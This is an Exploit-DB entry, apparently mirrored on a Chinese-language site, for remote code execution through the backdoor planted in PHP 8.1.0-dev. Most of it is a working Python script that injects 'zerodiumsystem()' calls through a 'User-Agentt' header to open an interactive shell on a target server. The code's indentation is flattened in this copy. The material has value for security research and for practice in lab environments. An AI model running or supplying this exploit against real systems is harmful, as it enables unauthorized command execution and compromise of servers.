PHP 8.1.0-dev – ‘User-Agentt’ Remote Code Execution

  • 作者: flast101
    日期: 2021-06-03
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/49933/
  • # Exploit Title: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
    # Date: 23 may 2021
    # Exploit Author: flast101
    # Vendor Homepage: https://www.php.net/
    # Software Link: 
    # - https://hub.docker.com/r/phpdaily/php
    #- https://github.com/phpdaily/php
    # Version: 8.1.0-dev
    # Tested on: Ubuntu 20.04
    # References:
    #- https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
    # - https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md
    
    """
    Blog: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
    Download: https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/backdoor_php_8.1.0-dev.py
    Contact: flast101.sec@gmail.com
    
    An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.
    The following exploit uses the backdoor to provide a pseudo shell ont the host.
    """
    
    #!/usr/bin/env python3
    import os
    import re
    import requests
    
    host = input("Enter the full host url:\n")
    request = requests.Session()
    response = request.get(host)
    
    if str(response) == '<Response [200]>':
    print("\nInteractive shell is opened on", host, "\nCan't acces tty; job crontol turned off.")
    try:
    while 1:
    cmd = input("$ ")
    headers = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
    "User-Agentt": "zerodiumsystem('" + cmd + "');"
    }
    response = request.get(host, headers = headers, allow_redirects = False)
    current_page = response.text
    stdout = current_page.split('<!DOCTYPE html>',1)
    text = print(stdout[0])
    except KeyboardInterrupt:
    print("Exiting...")
    exit
    
    else:
    print("\r")
    print(response)
    print("Host is not available, aborting...")
    exit